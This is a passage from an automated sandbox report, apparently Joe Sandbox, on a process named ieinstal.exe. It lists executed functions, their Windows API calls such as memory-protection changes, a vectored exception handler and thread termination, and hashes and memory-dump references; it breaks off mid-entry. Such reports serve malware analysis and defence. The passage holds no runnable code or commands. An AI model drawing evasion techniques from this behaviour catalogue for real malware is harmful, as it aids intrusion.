Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ieinstal.exe PID: 4232 Parent PID: 4792 ieinstal.exeCOMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.9%
Total number of Nodes:	1549
Total number of Limit Nodes:	24

Executed Functions

Function 00872BC0, Relevance: 4.6, APIs: 3, Instructions: 107
nativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000005), ref: 00872B4C
NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018), ref: 00872B8F

Part of subcall function 00871F4B: RtlAddVectoredExceptionHandler.NTDLL(?,Function_00001BDA), ref: 00871F51
Part of subcall function 00871F4B: NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018,?,?,?,?,?,?,00000000), ref: 00871FCE

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual$ExceptionHandlerSleepVectored
String ID:
API String ID: 56474747-0
Opcode ID: b2de851e53bba8a9cf8026e529fd1d46b16667b3ef32f01f8242479c97402b43
Instruction ID: b41f653167ef1007b16329a8e144418c6a1be7168033f7861cd712516740e3ef
Opcode Fuzzy Hash: b2de851e53bba8a9cf8026e529fd1d46b16667b3ef32f01f8242479c97402b43
Instruction Fuzzy Hash: B03138B15407059FE3216F6CCD86B2A7B69FF213A8F248295E515DB1EBC768CC408616

Uniqueness

Uniqueness Score: -1.00%

Function 00871F7C, Relevance: 4.6, APIs: 3, Instructions: 104
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00871F1C
NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018,?,?,?,?,?,?,00000000), ref: 00871FCE
NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual$TerminateThread
String ID:
API String ID: 2606452278-0
Opcode ID: edee26b7ecc1b08a38f06f07e14b8471ebe5792c27bcd6306a262537908ac9fa
Instruction ID: b188096f006e359dacaf54718112ac036caeed45d3cec58effaf23fb88bd27a5
Opcode Fuzzy Hash: edee26b7ecc1b08a38f06f07e14b8471ebe5792c27bcd6306a262537908ac9fa
Instruction Fuzzy Hash: F3313A70505304AFEB215F6CC98EB5A3765FF617A8F608289DD15CB0EAC734C8848611

Uniqueness

Uniqueness Score: -1.00%

Function 00872AB2, Relevance: 4.6, APIs: 3, Instructions: 99
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000005), ref: 00872B4C

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3a64d5f32c307e3e9885f72e3728db863836443a0a51430f28c83e5beda59d78
Instruction ID: baf3a086f13b1549e5fd1c720a7709d40909d4c2244e3700e9ba9324ea31de7d
Opcode Fuzzy Hash: 3a64d5f32c307e3e9885f72e3728db863836443a0a51430f28c83e5beda59d78
Instruction Fuzzy Hash: 4B3159A050434DDFD7202E288C58B7A2294FF1236CFB5D12AF91ECA0AEC774C8849613

Uniqueness

Uniqueness Score: -1.00%

Function 00871F4B, Relevance: 4.6, APIs: 3, Instructions: 93
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredExceptionHandler.NTDLL(?,Function_00001BDA), ref: 00871F51
NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018,?,?,?,?,?,?,00000000), ref: 00871FCE
NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual$ExceptionHandlerVectored
String ID:
API String ID: 4193742754-0
Opcode ID: b25ce1e8bd83f91fe020513ab164a9d6620fcc4991f4f6df968062ba34c518e4
Instruction ID: 1b6c6656aa4ee737d63602d65a3aca5786ad0d9a68f61a7def12e5b9c953a5dd
Opcode Fuzzy Hash: b25ce1e8bd83f91fe020513ab164a9d6620fcc4991f4f6df968062ba34c518e4
Instruction Fuzzy Hash: FF31D4B0100304EFE7149F28C9C9B9A7765FF213A8F618299EC59CB1A6D774D884CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00874707, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 424
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000), ref: 0087485F

Strings

[qV, xrefs: 00874710

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: LibraryLoad
String ID: [qV
API String ID: 1029625771-2305567309
Opcode ID: a54401a6dca73866f03913ea3c230bbc5e780a24d1af60cf44d40b8ddac59940
Instruction ID: 01ede1d396f1298bdb0a74a850ed6e9d3c8565efbb48025dccca4aaf70ceec15
Opcode Fuzzy Hash: a54401a6dca73866f03913ea3c230bbc5e780a24d1af60cf44d40b8ddac59940
Instruction Fuzzy Hash: 94918051C8470DAAF6347DEC8A42B761A59F7AA798ED4FB19E70EC714F8310CC02A46D

Uniqueness

Uniqueness Score: -1.00%

Function 00872D04, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Strings

TEMP=, xrefs: 00873760

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: TEMP=
API String ID: 2706961497-1038760399
Opcode ID: 11c9c9f6a1325c0a65001c09a44b10a0973b145eb6a569e6331738e0ea04111b
Instruction ID: 4588054a96eb5bd5a482a7623530a806ec4400ce81bcebe4c1b142a191c57753
Opcode Fuzzy Hash: 11c9c9f6a1325c0a65001c09a44b10a0973b145eb6a569e6331738e0ea04111b
Instruction Fuzzy Hash: BFD0A531F401115797317FFC464942D3911EBF97253B4C7357311D71D6C924C8014535

Uniqueness

Uniqueness Score: -1.00%

Function 00871D96, Relevance: 3.2, APIs: 2, Instructions: 241
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00871F1C
NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: f26bdd43b029ed90a120848664437d9b3e5886110e78767734875fb55085aac4
Instruction ID: 9512b0ebcf16617e3b1ccfa63655e75bb6aed924fe96cc73dd2b780445a1fcca
Opcode Fuzzy Hash: f26bdd43b029ed90a120848664437d9b3e5886110e78767734875fb55085aac4
Instruction Fuzzy Hash: CB1156712043049FEB218B28C9C6B9D3261FF61378F70829AED1AD71EAC774C8808612

Uniqueness

Uniqueness Score: -1.00%

Function 00871F07, Relevance: 3.1, APIs: 2, Instructions: 121
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00871F1C
NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: b0d63ef316458ba440cbdd981fbcd3af570a9cf950f47630a25f546613429e14
Instruction ID: 2d1dac31c147c0b4f72df048503ec8afe9c5ed64c3fe0c12ae1f8e3991ef2cbe
Opcode Fuzzy Hash: b0d63ef316458ba440cbdd981fbcd3af570a9cf950f47630a25f546613429e14
Instruction Fuzzy Hash: 902157711043049FEB218F6CC9C6B993661FF65368F70C29AED0ADB1EAC734C8808612

Uniqueness

Uniqueness Score: -1.00%

Function 00871FA2, Relevance: 3.1, APIs: 2, Instructions: 111
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018,?,?,?,?,?,?,00000000), ref: 00871FCE
NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: c327e44b1657d61a0653384bd230e442a481dc08ca4d2380c32a4434da3ee4bf
Instruction ID: ddcf8ce9e4ac4e630729338f86b5db3f8f35af11aaa61fa86d9817b355c8a50b
Opcode Fuzzy Hash: c327e44b1657d61a0653384bd230e442a481dc08ca4d2380c32a4434da3ee4bf
Instruction Fuzzy Hash: 4931F4B0500305AFEB249F6CC9C9B9A7765FF513A8F61C259ED49CB1ABC734C8448B91

Uniqueness

Uniqueness Score: -1.00%

Function 00871E9B, Relevance: 3.1, APIs: 2, Instructions: 110
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00871F1C
NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: 5149d3f769fbbef43cb95ae67b910a037e820965be05f989c7b02af396a8ac78
Instruction ID: b819312aeb87eee2cafe4a1f6429a96f89ca039694028f02310cc43eabf7a1a4
Opcode Fuzzy Hash: 5149d3f769fbbef43cb95ae67b910a037e820965be05f989c7b02af396a8ac78
Instruction Fuzzy Hash: 2F1133711043049FEB218B2889DAB993761FF62364F75829AED1ADB1EAC774C8808612

Uniqueness

Uniqueness Score: -1.00%

Function 00871F2E, Relevance: 3.1, APIs: 2, Instructions: 104nativethreadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00871F1C
NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: 60af5edc567b8e93eec25899c83bc19fd34a856d89d84ff4f7cbb1974a0fa7a4
Instruction ID: 18f3fca8381e6dfa95dd69a57f2dfae6c388cb4e484383a2cc37c918efbc1367
Opcode Fuzzy Hash: 60af5edc567b8e93eec25899c83bc19fd34a856d89d84ff4f7cbb1974a0fa7a4
Instruction Fuzzy Hash: 522135712043049EEB219F6CC9C6B993665FF653A8F60C296ED1AD71EAC724C8808626

Uniqueness

Uniqueness Score: -1.00%

Function 00872B58, Relevance: 3.1, APIs: 2, Instructions: 94sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00872B4C
NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018), ref: 00872B8F

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: 064069d83fc3d649eaadf20ccb6df8cd1217414f0c96282b006989759c9c0f1f
Instruction ID: aff4e5fc5803e257a5f349c0901381372e3f3e7233e39f886254c68eddde139f
Opcode Fuzzy Hash: 064069d83fc3d649eaadf20ccb6df8cd1217414f0c96282b006989759c9c0f1f
Instruction Fuzzy Hash: 772147A2848785AFE3222E788C097667F64FF23364F1982D6C159CF0F7D354CC468662

Uniqueness

Uniqueness Score: -1.00%

Function 00871EEC, Relevance: 3.1, APIs: 2, Instructions: 70nativethreadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00871F1C
NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: cfa3f081948cf8787c2da502513d6ed109c5fa0a0cb037942bbc8ffce59660f7
Instruction ID: c6273eb6673af7b9d7de220f944ba5f968831e79cba000b33d4d389ccea61d55
Opcode Fuzzy Hash: cfa3f081948cf8787c2da502513d6ed109c5fa0a0cb037942bbc8ffce59660f7
Instruction Fuzzy Hash: E31138712043049FEB218B18C9C6B9D3261FF65378F70C29AED1AD71EAD774C8809612

Uniqueness

Uniqueness Score: -1.00%

Function 00872BA4, Relevance: 3.1, APIs: 2, Instructions: 53sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00872B4C
NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018), ref: 00872B8F

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: b4cf12e3fa7dcf1d51be45549978839991e2e50839d13ee497e93bd67c962405
Instruction ID: 0d55501fe218230f8c347c1eaac8c3e6b8512fb74c1f4fca1192c23192fa3b52
Opcode Fuzzy Hash: b4cf12e3fa7dcf1d51be45549978839991e2e50839d13ee497e93bd67c962405
Instruction Fuzzy Hash: 7B01F7B1880746DFE2206EADCD497367798FF21329F65C255D519CB0EBD360CD418962

Uniqueness

Uniqueness Score: -1.00%

Function 00874B2C, Relevance: 3.0, APIs: 2, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00874B5C
GetProcAddress.KERNEL32(00000000,?), ref: 00874B93

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: f4fecd6dfcc7da2747a14ef943163e0def8b9c5381c65ab3b5fb818adf331fe8
Instruction ID: 519035eeb8a920bddda563837359587106b4c0082f628418e5457ce4d8ad2406
Opcode Fuzzy Hash: f4fecd6dfcc7da2747a14ef943163e0def8b9c5381c65ab3b5fb818adf331fe8
Instruction Fuzzy Hash: D3D0C93040410DFF8F155E9499197E97B25FE013A5B64E445BC9AD50088334C956BA11

Uniqueness

Uniqueness Score: -1.00%

Function 00875ADF, Relevance: 1.8, APIs: 1, Instructions: 272nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?,008756D6,00000040,00000000,00000000,00000000,00000000), ref: 00875AAB

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 71b1a9166a28de4c157c251a90bc094f5a92fbf80ee40d66e845850d7c351b09
Instruction ID: 8ace91ffc43ba6e42cb910b00d8acd8835f7ab43c3444eede531d42b4dc11cc2
Opcode Fuzzy Hash: 71b1a9166a28de4c157c251a90bc094f5a92fbf80ee40d66e845850d7c351b09
Instruction Fuzzy Hash: 9D5176A151CBC81FE31A972888D5B723BA9FB67308F58819ED18AC7187E695DC068321

Uniqueness

Uniqueness Score: -1.00%

Function 00874CD2, Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b5afbbabb47f8c259842162ee2b5bd776c173e954b73cfe2365d0f3e3a6bb6
Instruction ID: 5dd16d954101ac310253fa7b0b0b5cb0818df20110504a764b5b7e0ddfe1975d
Opcode Fuzzy Hash: 32b5afbbabb47f8c259842162ee2b5bd776c173e954b73cfe2365d0f3e3a6bb6
Instruction Fuzzy Hash: 7831792560830DDACB35999885807B92691FB5637CFB4F63AED8FC710DC734C841A603

Uniqueness

Uniqueness Score: -1.00%

Function 00872C7B, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d1474beff6a398bc395ca7f7ba8a86072247c6cb863f2a556fcdd3efa55f0166
Instruction ID: ce02c61fb998cbdcd2ec2cd5499f2494f90cc7142b42816093a42d2bd3b93af2
Opcode Fuzzy Hash: d1474beff6a398bc395ca7f7ba8a86072247c6cb863f2a556fcdd3efa55f0166
Instruction Fuzzy Hash: 27119B61C403059EE7326FAC8DC2B7A2B64FF99778F64C38AD209DF08FC120C8454528

Uniqueness

Uniqueness Score: -1.00%

Function 00872003, Relevance: 1.6, APIs: 1, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018,?,?,?,?,?,?,00000000), ref: 00871FCE

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: ecf66d047d239183d96bdc5418c3b58e5a96c67aa7bf9691db79783471113c3b
Instruction ID: c13b729d8d30e0e71df6383f65785afcb0d2cdab7fe1828d4f7758b1ed23cfb7
Opcode Fuzzy Hash: ecf66d047d239183d96bdc5418c3b58e5a96c67aa7bf9691db79783471113c3b
Instruction Fuzzy Hash: AD212770640701DFEB259E78C9C8B917661FF62398F548358CD558B2DBD734C885CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00872CCC, Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 2dc871e98cda006e6dce8311ff210f185840c28cc1a7f943cf9ab34e9f889f1e
Instruction ID: 888734cdf3691cc4f42ae927218bb6ef00b8f1d83a19e2d0ad9b778dea00790b
Opcode Fuzzy Hash: 2dc871e98cda006e6dce8311ff210f185840c28cc1a7f943cf9ab34e9f889f1e
Instruction Fuzzy Hash: 47014EB1C40205AAE3316FFD8D42B2E2628FFE57A8B64C7559219D719BC524CC024428

Uniqueness

Uniqueness Score: -1.00%

Function 00872C33, Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 655b15b7fa0b906d0719aabf5b7bdf339e4e929447ad806faf4c0345df4d7637
Instruction ID: c3ec4e1f71819551bd9729e2f4005833f92af9dc0684f900dec531f375b7d1b3
Opcode Fuzzy Hash: 655b15b7fa0b906d0719aabf5b7bdf339e4e929447ad806faf4c0345df4d7637
Instruction Fuzzy Hash: 3D113A705413048EEB319F6CC8C1B6A3724FF693B4F64C29AD959CB1EBC724CC418656

Uniqueness

Uniqueness Score: -1.00%

Function 00871FD3, Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018,?,?,?,?,?,?,00000000), ref: 00871FCE

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: ba07908c486001a52957dbe49c5835dcc967821f83f6a26617b40bb11821a71c
Instruction ID: 85193b99f1054216fbd99fb77ebf848795fabe3cefa7efca7883f0e2321589ad
Opcode Fuzzy Hash: ba07908c486001a52957dbe49c5835dcc967821f83f6a26617b40bb11821a71c
Instruction Fuzzy Hash: AE11E170849340AFE7559F3C98897917FA0FF12768F554299C984CB4A7CB30C909CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00872BDA, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 042695000ac53a34270b2b1e7ee18b9cec6717d26952ad1c04939e8cf82e7c62
Instruction ID: db508d4fb169f99ee93a65c40b248caf57b8ac49b367d84da8e50246f54e6d9c
Opcode Fuzzy Hash: 042695000ac53a34270b2b1e7ee18b9cec6717d26952ad1c04939e8cf82e7c62
Instruction Fuzzy Hash: E0014CB01013048FE7228B28C4C2B5E3725FF623A8F3081A5E916CB2E6C778CC809616

Uniqueness

Uniqueness Score: -1.00%

Function 00872BBC, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00871F4B: RtlAddVectoredExceptionHandler.NTDLL(?,Function_00001BDA), ref: 00871F51
Part of subcall function 00871F4B: NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018,?,?,?,?,?,?,00000000), ref: 00871FCE

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual$ExceptionHandlerVectored
String ID:
API String ID: 4193742754-0
Opcode ID: 708d6c91bfc65ce7058b17b8d0af125e554e6172c69961088c275a9ee95d1fd7
Instruction ID: 1619c834ba71640d99e159b4e6cf0c722fda1a07cb2d632625db2f261b2a14fd
Opcode Fuzzy Hash: 708d6c91bfc65ce7058b17b8d0af125e554e6172c69961088c275a9ee95d1fd7
Instruction Fuzzy Hash: 9B01D8701013049FEB219B28C8C6B5E3725FF653A4F61C295E959D71EAC778D8809616

Uniqueness

Uniqueness Score: -1.00%

Function 00872C60, Relevance: 1.5, APIs: 1, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a9b17e2988cc64078547cc692c0904c710f1d3a55874d0a1938a4db29b2bd1e0
Instruction ID: 1e5c7ae2366416860993ce5c7fe69d81a39bf7e49e3cda15d6e19aa6a41e1286
Opcode Fuzzy Hash: a9b17e2988cc64078547cc692c0904c710f1d3a55874d0a1938a4db29b2bd1e0
Instruction Fuzzy Hash: 83F028B11003049FEB224F3889C2B2E3664FF613A8F31C2E5D51ADB1EBC338C8819116

Uniqueness

Uniqueness Score: -1.00%

Function 00872CB4, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d0e4c0b5a2833bc426826a58d31a7768f1ac0160df2e882b840a76b679e83fe3
Instruction ID: c4abde7d678bb731e2d90023c1935384b68999c93b8623e39e801e6527bd0cb2
Opcode Fuzzy Hash: d0e4c0b5a2833bc426826a58d31a7768f1ac0160df2e882b840a76b679e83fe3
Instruction Fuzzy Hash: E0F02E715406059FEB111F5CCD85B2A2B54FF16378F34C765E615D61D6C774C8408215

Uniqueness

Uniqueness Score: -1.00%

Function 00872C13, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00872C91

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e068ec475873d21adf827b5761322f1d24c4f90df15e0e90cc880ed85ff6bfcc
Instruction ID: cd047aaa625e61731e91a090e977c411f784da178012ab288d0df940d62835d1
Opcode Fuzzy Hash: e068ec475873d21adf827b5761322f1d24c4f90df15e0e90cc880ed85ff6bfcc
Instruction Fuzzy Hash: E8F0E2B11007159FEB225B2C89C6F5E6635FF613A8B30C2A9E96ADB1EAC738C4414526

Uniqueness

Uniqueness Score: -1.00%

Function 00872B54, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018), ref: 00872B8F

Memory Dump Source

